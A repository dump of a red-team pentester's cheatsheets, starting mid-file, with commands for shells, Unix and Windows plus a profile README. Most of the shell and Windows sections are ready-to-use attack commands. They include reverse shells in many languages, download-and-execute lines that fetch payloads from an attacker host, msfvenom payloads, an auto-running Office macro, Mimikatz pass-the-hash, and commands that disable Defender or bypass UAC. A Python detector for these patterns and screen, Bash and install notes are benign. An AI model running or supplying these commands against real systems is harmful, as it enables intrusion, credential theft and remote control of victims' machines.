";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' 31 | payload = 'Invoke-WebRequest -Uri http://%s/nc.exe -Outfile C:\\Windows\\Temp\\nc.exe ; C:\\Windows\\Temp\\nc.exe -e cmd.exe %s %d;' 32 | payload = payload % (ip, ip, port) 33 | print (payload) 34 | cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode() 35 | print(cmdline) 36 | ``` 37 | 38 | ## Encode/decode url 39 | 40 | using cli 41 | 42 | ```bash 43 | alias urldecode='python -c "import sys, urllib as ul; \ print ul.unquote_plus(sys.argv[1])"' 44 | alias urlencode='python -c "import sys, urllib as ul; \ print ul.quote_plus(sys.argv[1])"' 45 | # using => urlencode 'q werty=/;' 46 | ``` 47 | 48 | --- 49 | -------------------------------------------------------------------------------- /Cheatsheets/useful-commands/screen.md: -------------------------------------------------------------------------------- 1 | # Screen 2 | 3 | ## Screen multiuser 4 | 5 | ```bash 6 | screen -S 7 | screen -x 8 | ctrl+a :multiuser on 9 | ``` 10 | 11 | If you are stucked with a small windows into multiuser screen 12 | 13 | ```bash 14 | # detach 15 | ctrl+a d 16 | # reattach detaching everyone else 17 | screen -rd 18 | ``` 19 | 20 | ## Log screen 21 | 22 | ```bash 23 | ctrl+a H 24 | ``` 25 | 26 | ## Split screen 27 | 28 | ```bash 29 | # split horizontal 30 | CTRL+a + maj S 31 | # split vertical 32 | CTRL+a + | 33 | # unsplit 34 | CTRL+a + X 35 | ``` 36 | 37 | ## Switch window on screen 38 | 39 | ```bash 40 | CTRL+a + tab 41 | ``` 42 | 43 | ## Next/precedent window 44 | 45 | ```bash 46 | CTRL+a + n 47 | CTRL+a + p 48 | ``` 49 | 50 | ## New Window 51 | 52 | ```bash 53 | CTRL+a + c 54 | ``` 55 | 56 | ## Scroll 57 | 58 | ```bash 59 | CTRL+a + echap 60 | ``` 61 | 62 | ## Close window 63 | 64 | ```bash 65 | CTRL + d 66 | ``` 67 | 68 | ## Detach screen 69 | 70 | ```bash 71 | CTRL+a + d 72 | ``` 73 | 74 | ## Detach screen and 
close window 75 | 76 | ```bash 77 | CTRL+a + DD 78 | ``` 79 | 80 | --- 81 | -------------------------------------------------------------------------------- /Cheatsheets/useful-commands/shell.md: -------------------------------------------------------------------------------- 1 | # Shells 2 | 3 | 4 | ## Windows Shell 5 | 6 | ### SMB 7 | 8 | ```bash 9 | wmiexec.py \:@ 10 | winexe -U /% // cmd.exe /c dir C:\ 11 | pth-winexe -U % // cmd 12 | impacket-psexec ':@' 13 | impacket-psexec @targets.txt -u domain\user -p password -s command 14 | 15 | crackmapexec smb --exec-method wmiexec -u -d -H -x 16 | crackmapexec smb --exec-method smbexec -u -d -H -x 17 | crackmapexec smb --exec-method atexec -u -d -H -x 18 | crackmapexec smb --exec-method mmcexec -u -d -H -x 19 | 20 | WmiExec.ps1 -ComputerName "" -Command "Get-ChildItem C:\" 21 | 22 | Invoke-Mimikatz -Command '"sekurlsa::pth /user: /domain: /ntlm: /run:cmd.exe"' 23 | Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName 24 | 25 | wmic /node:"" /user:"" /password:"" process call create "powershell -Sta -Nop -Window Hidden -EncodedCommand " 26 | 27 | schtasks /create /S /SC Weekly /RU /TN /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http:///Invoke-PowerShellTcp.ps1''')'" ; schtasks /Run /S /TN 28 | 29 | Copy-Item .\nc.exe \\\C$\Users\Public\Downloads 30 | schtasks /create /S /SC Weekly /RU /TN /TR "C:\Users\Public\Downloads\nc.exe -e cmd " ; schtasks /Run /S /TN 31 | 32 | ``` 33 | 34 | ### WinRM 35 | 36 | ```bash 37 | gem install evil-winrm 38 | evil-winrm -i -u -p '' 39 | ``` 40 | 41 | 42 | --- 43 | 44 | 45 | ## SQL shell 46 | 47 | ### Mysql webshell 48 | 49 | ```bash 50 | SELECT '' INTO OUTFILE '/' 51 | 52 | ``` 53 | 54 | ### MSSQL reverse shell 55 | 56 | ```bash 57 | # https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1 58 | Invoke-SQLOCmd -Verbose -Command "powershell iex(New-Object 
Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1') -Instance 59 | ``` 60 | 61 | --- 62 | 63 | ## Reverse Shell 64 | 65 | 66 | ### Check outgoing ports 67 | 68 | **Internet** 69 | 70 | [portquiz](http://portquiz.net/) 71 | 72 | **local** 73 | 74 | ```bash 75 | # Generate and execute on target 76 | msfvenom -p windows/meterpreter/reverse_tcp_allports -f exe > test_firewall.exe 77 | 78 | # Listen for incoming traffic 79 | tcpdump -ni any host 80 | ``` 81 | ### CMD 82 | 83 | ```bash 84 | certutil -urlcache -split -f http://:1234/shell.exe C:\Windows\Temp\shell.exe & start "" C:\Windows\Temp\shell.exe 85 | 86 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U shell.exe 87 | ``` 88 | 89 | ### Powershell 90 | 91 | ```bash 92 | # Reflective PE injection 93 | String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http:///met.dll');(New-Object System.Net.WebClient).DownloadString('http:///Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid"; 94 | 95 | # Basic download and exec 96 | Invoke-WebRequest -Uri "http://:1234/nc.exe" -OutFile "nc.exe" & .\nc.exe -e cmd.exe 1234 97 | 98 | echo Invoke-WebRequest -Uri http://:1234/revshell.exe -Outfile c:\windows\temp\revshell.exe | powershell -noprofile 99 | 100 | powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://:1234/shell.ps1')|iex" 101 | 102 | powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = 
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 103 | 104 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 105 | 106 | powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1') 107 | 108 | # Powercat 109 | IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1') 110 | 111 | powercat -c -p 1234 -e cmd.exe 112 | 113 | powercat -c -p 1234 -e cmd.exe -g > reverse.ps1 114 | .\reverse.ps1 115 | 116 | powercat -c -p 1234 -e cmd.exe -ge > reverse 117 | 118 | powershell -e ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgA..... 
```


### Bash TCP

```bash
bash -i >& /dev/tcp//1234 0>&1
0<&196;exec 196<>/dev/tcp//4242; sh <&196 >&196 2>&196
exec 5<> /dev/tcp//4242; cat <&5 | while read line; do $line 2>&5>&5; done
```

### Bash UDP

```bash
# Victim:
sh -i >& /dev/udp//4242 0>&1

# Listener:
nc -u -lvp 4242
```

> Don't forget to try the other shells as well: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash



### Python

```sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

export RHOST="";export RPORT=1234;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

### Perl

```bash
perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,":1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

### PHP

```bash
php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("",1234);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("",1234);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("",1234);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("",1234);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("",1234);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("",1234);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
```


### Ruby

```bash
ruby -rsocket -e'f=TCPSocket.open("",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```


### Netcat

```bash
nc -e /bin/sh 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f
```

### Socat

```bash
socat -d -d TCP4-LISTEN:1234 STDOUT
socat TCP4::1234 EXEC:/bin/bash

socat TCP4-LISTEN:1234,reuseaddr,fork EXEC:/home/leak
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::1234

socat file:`tty`,raw,echo=0 TCP-L:1234
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::1234


wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::1234
```

### Awk

```bash
awk 'BEGIN {s = "/inet/tcp/0//1234"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```

### War

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1234 -f war > reverse.war
```


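The one-liners in this section are also what process-creation telemetry should recognise. The following is an added example, not part of the original cheatsheet: a small Python detector whose rules mirror the shells listed above, run over constructed sample events (the rule names, the `classify`/`scan` helpers and the sample data are mine, not the page's).

```python
"""Spot the reverse-shell launch patterns above in process command lines.

Added example (not from the original cheatsheet): each rule mirrors one of the
one-liners in this section, so the catalogue doubles as detection logic for
process-creation telemetry (auditd EXECVE, Sysmon event 1, EDR feeds).
Encoded PowerShell (-e/-enc, UTF-16LE base64) is decoded and re-checked.
The sample events at the bottom are constructed, not captured from a real host.
"""
import base64
import re

# (rule name, regex). Kept narrow on purpose: each keys on the socket + shell
# combination, not on the mere presence of nc, python or powershell.
RULES = [
    ("bash-dev-tcp",        re.compile(r"/dev/(?:tcp|udp)/")),
    ("nc-exec-shell",       re.compile(r"\bnc(?:at)?\b.*\s-e\s*/bin/(?:ba)?sh")),
    ("mkfifo-nc-pipe",      re.compile(r"mkfifo\s+\S+.*\|\s*nc\b")),
    ("python-socket-dup2",  re.compile(r"socket\.socket\(.*os\.dup2\(|pty\.spawn\(")),
    ("php-fsockopen-exec",  re.compile(r"fsockopen\(.*(?:exec|system|passthru|popen|proc_open)\(")),
    ("perl-socket-exec",    re.compile(r"(?:IO::Socket::INET|PF_INET).*(?:exec|system)")),
    ("ruby-tcpsocket-exec", re.compile(r"TCPSocket\.(?:open|new)\(.*(?:exec|popen)")),
    ("socat-exec-tcp",      re.compile(r"socat\b.*exec:.*\btcp", re.I)),
    ("awk-inet-tcp",        re.compile(r"/inet/tcp/")),
    ("ps-tcpclient",        re.compile(r"Net\.Sockets\.TCPClient\(", re.I)),
    ("ps-download-iex",     re.compile(r"IEX\s*\(.*DownloadString\(|(?:DownloadString|iwr)\(.*\|\s*IEX\b", re.I)),
    ("ps-encoded-hidden",   re.compile(r"powershell(?:\.exe)?\b.*-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("powercat-exec",       re.compile(r"\bpowercat\b.*-e\s+\S+", re.I)),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_powershell(cmdline):
    """Plaintext of a -EncodedCommand argument, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def classify(cmdline):
    """Names of every rule matched by the command line or its decoded payload."""
    texts = [cmdline]
    decoded = decode_encoded_powershell(cmdline)
    if decoded:
        texts.append(decoded)
    return [name for name, rx in RULES if any(rx.search(t) for t in texts)]


def scan(events):
    """events: iterable of (pid, user, cmdline); returns (pid, user, rules) for hits only."""
    return [(pid, user, classify(cmd)) for pid, user, cmd in events if classify(cmd)]


# Constructed sample telemetry; 203.0.113.5 is an RFC 5737 documentation address.
ENCODED_PS = base64.b64encode(
    "$client = New-Object System.Net.Sockets.TCPClient('203.0.113.5',1234)".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    (4120, "www-data", "bash -i >& /dev/tcp/203.0.113.5/1234 0>&1"),
    (4133, "www-data", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.5 1234 >/tmp/f"),
    (4150, "tomcat", "python -c 'import socket,os;s=socket.socket();s.connect((\"203.0.113.5\",1234));os.dup2(s.fileno(),0)'"),
    (612, "CORP\\svc_app", "powershell.exe -nop -w hidden -e " + ENCODED_PS),
    (700, "alice", "python3 -m http.server 8080"),  # benign: the file server used below
    (701, "bob", "nc -zv db.internal 5432"),        # benign: plain connectivity check
]

if __name__ == "__main__":
    for pid, user, hits in scan(SAMPLE_EVENTS):
        print(f"pid={pid} user={user} rules={','.join(hits)}")
```

The encoded PowerShell event only fires `ps-tcpclient` because the base64 is decoded first; matching on the raw command line alone would see nothing but `-e` followed by an opaque blob.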
---

## Get interactive listener

Using Pwncat

```bash
pwncat-cs -p
# then CTRL+D to move to the victim machine
```

---

## Get better BASH shell

Using socat

```bash
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:1234

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::1234
```

Using stty

```bash
python -c 'import pty; pty.spawn("/bin/sh")'
# press ctrl + z to background the shell
stty raw -echo;fg
reset
```

## File transfer

### Bitsadmin

```bash
certutil -encode exe.exe file.txt
bitsadmin /Transfer jobname http:///file.txt C:\\file.txt
certutil -decode file.txt exe.exe
```

### Netcat

```bash
nc -nlvp 80 > received.txt
nc 80 < sent.txt
```

### Socat

Socat nossl

```bash
socat TCP4-LISTEN:80,fork file:secret_passwords.txt
socat TCP4::80 file:received_secret_passwords.txt,create
```

Socat SSL

```bash
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
# socat expects key and certificate in a single PEM file
cat bind_shell.key bind_shell.crt > bind_shell.pem
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

socat - OPENSSL::443,verify=0
```

### Python HTTP

```bash
python -m SimpleHTTPServer 8080
python3 -m http.server 8080
```

### SMB impacket

```bash
sudo impacket-smbserver -smb2support share_name /tmp/sharefolder
copy \\\\
```

### Powershell

```bash
# disable UAC first
Set-ExecutionPolicy Unrestricted
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
Invoke-WebRequest -Uri http:/// -Outfile
```

### Powercat

```bash
nc -lnvp 1234 >
powercat -c -p 1234 -i

powercat -l -v -p 443 -t 1000
```

## Metasploit

```bash
# Generate shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=1234 -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1234 -f exe > reverse.exe
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT=1234 -f macho > shell.macho
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1234 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1234 -f war > shell.war
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=1234 -f raw > shell.php; cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php

# Generate handler
msfconsole
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
jobs -l
jobs -K
set ExitOnSession false
set AUTORUNSCRIPT post/windows/manage/migrate
run -j
makerc /tmp/msf.rc
msfconsole -r /tmp/msf.rc

# Download and execute on target
wget :1234/shell.elf -O /tmp/shell.elf && chmod 777 /tmp/shell.elf && /tmp/shell.elf &

# Upload, hide and exec from meterpreter
execute -H -i -c -m -d calc.exe -f /tmp/exploit.exe -a '-arg1 -arg2 -arg3'

# Multi post modules
echo "post/windows/gather/credentials/sso" >> /tmp/multi_post.rc
echo "post/windows/gather/credentials/gpp" >> /tmp/multi_post.rc
use post/multi/manage/multi_post
set MACRO /tmp/multi_post.rc
set SESSION 1
run -j
```

## Office Macro


```bash
# generate using metasploit
msfvenom -p windows/shell_reverse_tcp LHOST="" LPORT=443 -f hta-psh > revshell.hta

# python split macro
str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."
n = 50
for i in range(0, len(str), n):
    print("Str = Str + " + '"' + str[i:i+n] + '"')


# macro
Sub AutoOpen()
    juan
End Sub

Sub Document_Open()
    juan
End Sub

Sub juan()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZ"
    Str = Str + "QByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA"
    Str = Str + "AAvAE0AVABpAFIAVABEACcAKQApADsA"

    CreateObject("Wscript.Shell").Run Str
End Sub
```

## Web proxies

- Use an allowed domain such as cloudfront.net, wordpress.net, azurewebsites.net, etc.
- Check the User-Agent
--------------------------------------------------------------------------------
/Cheatsheets/useful-commands/unix.md:
--------------------------------------------------------------------------------
# Bash

## Alias

```bash
# Clipboard
alias sclip="xclip -selection c"
alias gclip="xclip -selection c -o"

# IPs
grep -ao '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'| sort -u

# IP Ranges
awk -F. '{print $1"."$2"."$3".0/24"}'

## Nmap parsing (Hosts up)
cat *.gnmap | grep -i "open/tcp" | cut -d " " -f2 | sort -u

## Nmap parsing (Open Ports)
cat *.nmap | grep -i " open" | cut -d "/" -f1 | sort -u | paste -sd ','

## Nessus parsing (Hosts up)
cat *.csv |grep -i 'tcp",' |cut -d "," -f5 | tr -d '"' |sort -u

## Nessus parsing (Open Ports)
cat *.csv |grep -i 'tcp",' |cut -d "," -f7 | tr -d '"' |sort -u | sed -r '/^\s*$/d' | tr "\n" ", " | rev | cut -c2- |rev | sed 's/, */, /g' | cut -f 2- -d ' '

# SAM hash (from crackmapexec log files)
awk -F: '{print $1":"$3":"$4}' |tr [:upper:] [:lower:] | sort -u
```

## Save output to log file

```bash
| tee -a /tmp/logfile
```

## Compilation

Compile for x86 Linux from an x64 Linux machine

```bash
sudo apt update && sudo apt install -y gcc-multilib
gcc -Wl,--hash-style=both -m32
```

Cross-compile for x86 Windows from an x64 Linux machine

```bash
sudo apt update && sudo apt install -y mingw-w64
i686-w64-mingw32-gcc
i686-w64-mingw32-gcc -lws2_32 MS11-046.c
```


## Search for files

```bash
find / -iname "*user.txt*" 2>/dev/null
updatedb && locate
```

## Services listening

```bash
netstat -latupen |grep LISTEN
```

## Running processes

```bash
ps faux
```

## Disk space

```bash
df -h
ncdu -x
```

---

## Netcat send file

```bash
# listener
nc -l -p 1234 > out.file

# sender
nc -w 3 1234 < in.file
```

---


## Speak to other users

```bash
who
write /dev/pts/
echo "hello" |wall
```

---

## Nginx symlink

```bash
# from the sites-enabled directory, run:
ln -s ../sites-available/.conf .
```

## RDP

```sh
xfreerdp /u: /d: /pth:[lm]: /v:
rdesktop -u -p -r disk:floppy=/tmp/share
```

## Fail2ban

```bash
fail2ban-client status # to list all jails
fail2ban-client status
fail2ban-client set unbanip XX.XX.XX.XX # To unban someone
fail2ban-client -vvv set banip XX.XX.XX.XX # To ban someone
```

You can also list every IP banned by a jail with `zgrep 'Ban' /var/log/fail2ban.log* | grep `


> Since version 0.10 you can use `unban --all`



## VeraCrypt

### How to create a volume
`veracrypt -t --create report.vc --hash sha512 --encryption AES --filesystem ext4 --volume-type normal -k "" --pim 0 --size 200M`

> You can also add `--password test`, but that isn't recommended

### How to open a volume

`veracrypt /media/`
> By default it will mount into /media/veracrypt

### How to lock a volume

`veracrypt -d `
> By default `-d` without a volume file will lock every container




## One-line install

### Install Golang

```bash
sudo apt update && sudo apt install -y golang subfinder && export GOROOT=/usr/lib/go && export GOPATH=$HOME/go && export PATH=$GOPATH/bin:$GOROOT/bin:$PATH;
```

### Install Docker

```sh
# Install docker from kali repo
sudo apt update && sudo apt install -y docker.io && sudo usermod -aG docker $USER && exec sg docker newgrp `id -gn`

# Install docker from docker repo
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
sudo apt update && sudo apt remove docker docker-engine docker.io && sudo apt install docker-ce -y
```

### Install SublimeText

```sh
wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo apt-key add - && sudo apt-get install apt-transport-https && echo "deb https://download.sublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list && sudo apt-get update && sudo apt-get install sublime-text
```


### Install Arsenal

Inventory of useful commands

```bash
# Install Arsenal
git clone https://github.com/Orange-Cyberdefense/arsenal.git && cd arsenal && ./addalias.sh && ./run

# Install Arsenal (with package)
git clone https://github.com/Orange-Cyberdefense/arsenal.git && cd arsenal && sudo python3 setup.py install; cd arsenal; python3 app.py
```

--------------------------------------------------------------------------------
/Cheatsheets/useful-commands/windows.md:
--------------------------------------------------------------------------------
# Windows

## Install Windows Terminal

- [Windows Terminal](https://github.com/microsoft/terminal/releases)

## Install Kali WSL

1. [Enable Virtual Platform & WSL features Windows](https://www.configserverfirewall.com/windows-10/please-enable-the-virtual-machine-platform-windows-feature-and-ensure-virtualization-is-enabled-in-the-bios/)
2. Install the latest Kali Linux from the Microsoft Store (Microsoft account not required)

## Download file

```powershell
certutil.exe -urlcache -f

iwr -uri -Outfile
```

## Download & Exec

```powershell
iex (New-Object Net.Webclient).DownloadString("")

# Reverse powershell x64
c:\windows\sysnative\windowspowershell\v1.0\powershell.exe IEX(new-object net.webclient).downloadstring('http://10.10.14.12/Invoke-PowerShellTcp.ps1')


$ss = New-PSSession -ComputerName
Enter-PSSession -Session $ss
Invoke-Command -Session $ss -ScriptBlock { iwr -uri http://192.168.56.2/Invoke-Mimikatz.ps1 -OutFile .\Invoke-Mimikatz.ps1 ; . .\Invoke-Mimikatz.ps1 ; Invoke-Mimikatz }
```

---

## Runas

```bash
runas /netonly /user: "C:\Program Files\file.exe"
```

## Execution Policy

```powershell
powershell -ep bypass
```

## Constrained Language Mode

```powershell
$ExecutionContext.SessionState.LanguageMode

Invoke-Command -Session $ss -ScriptBlock {$ExecutionContext.SessionState.LanguageMode}

```

## Applocker check

```powershell
Get-AppLockerPolicy -Effective | select -ExpandProperty rulecollections
```

## AV disable

```powershell
Set-MpPreference -DisableRealTimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
```

## UAC bypass

```powershell
Invoke-EventVwrBypass -Command "powershell.exe whoami /all"
```

## Impersonate

```powershell
# PlainText
$Password = ConvertTo-SecureString "" -AsPlainText -Force; $Credential = New-Object System.Management.Automation.PSCredential("", $Password);
Invoke-Command -ComputerName -ScriptBlock { hostname; whoami } -Credential $Credential

# SecureString
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000028bf2'
$passwd = $securepasswd | ConvertTo-SecureString
# $passwd is now a System.Security.SecureString
$creds = New-Object System.Management.Automation.PSCredential ("\administrator", $passwd)
Invoke-Command -ScriptBlock {net localgroup Administrators \ /add} -ComputerName -Credential $creds
```

## Pivot

```powershell
$secure = New-PSSession -ComputerName
Enter-PSSession -Session $secure
```

---

## Import PS1 module

```powershell
import-module
. ./
```
> The full path is sometimes mandatory for Import-Module!


## PS remoting

```powershell
$sess = New-PSSession -ComputerName
Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

$sess = New-PSSession -ComputerName
Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
```



## Force change password

```powershell
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString '' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('', $SecPassword)
$UserPassword = ConvertTo-SecureString '' -AsPlainText -Force
Set-DomainUserPassword -Identity prodadmin -AccountPassword $UserPassword -Credential $Cred

Set-ADAccountPassword -Identity -NewPassword (ConvertTo-SecureString -AsPlainText '' -Force)
```



## Ping Scans

```powershell
1..255| foreach {Test-Connection -ComputerName "192.168.1.$_"}
```

---

## Port Scan

```powershell
1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("",$_)) "$_ is open" } 2>out-null
```
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Profile

---


> **Red Team Operator | Pentester | Ethical Hacker**

---

## Certifications
> `OSCP` - [Offensive Security Certified Professional](https://www.offensive-security.com/pwk-oscp/).

> `OSCE` - [Offensive Security Certified Expert](https://www.offensive-security.com/pen300-osep/).

> `OSWE` - [Offensive Security Web Expert](https://www.offensive-security.com/awae-oswe/).

---

## Hacking Platforms
- [HackTheBox](https://www.hackthebox.eu/profile/38480)
- [Root-me](https://www.root-me.org/michmich-51168)

---

## Website
- [michmich.eu](https://michmich.eu)

### How to contribute

Just fork [this repository](https://github.com/michmich1000/Cheatsheets), then create a branch, work on and push your content, and open a PR:

```bash
git clone
git checkout -b
git add -p
git commit -m "YourCommitName"
git push origin
```

### Contributors

- [Jenaye](https://github.com/jenaye)
- [Juan-Pablito](https://github.com/juan-pablito)
--------------------------------------------------------------------------------
/assets/images/logo_dark.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/michmich1000/Cheatsheets/6b4baa1255896e97624ad6f6d3a6a680cceb6dc1/assets/images/logo_dark.png
--------------------------------------------------------------------------------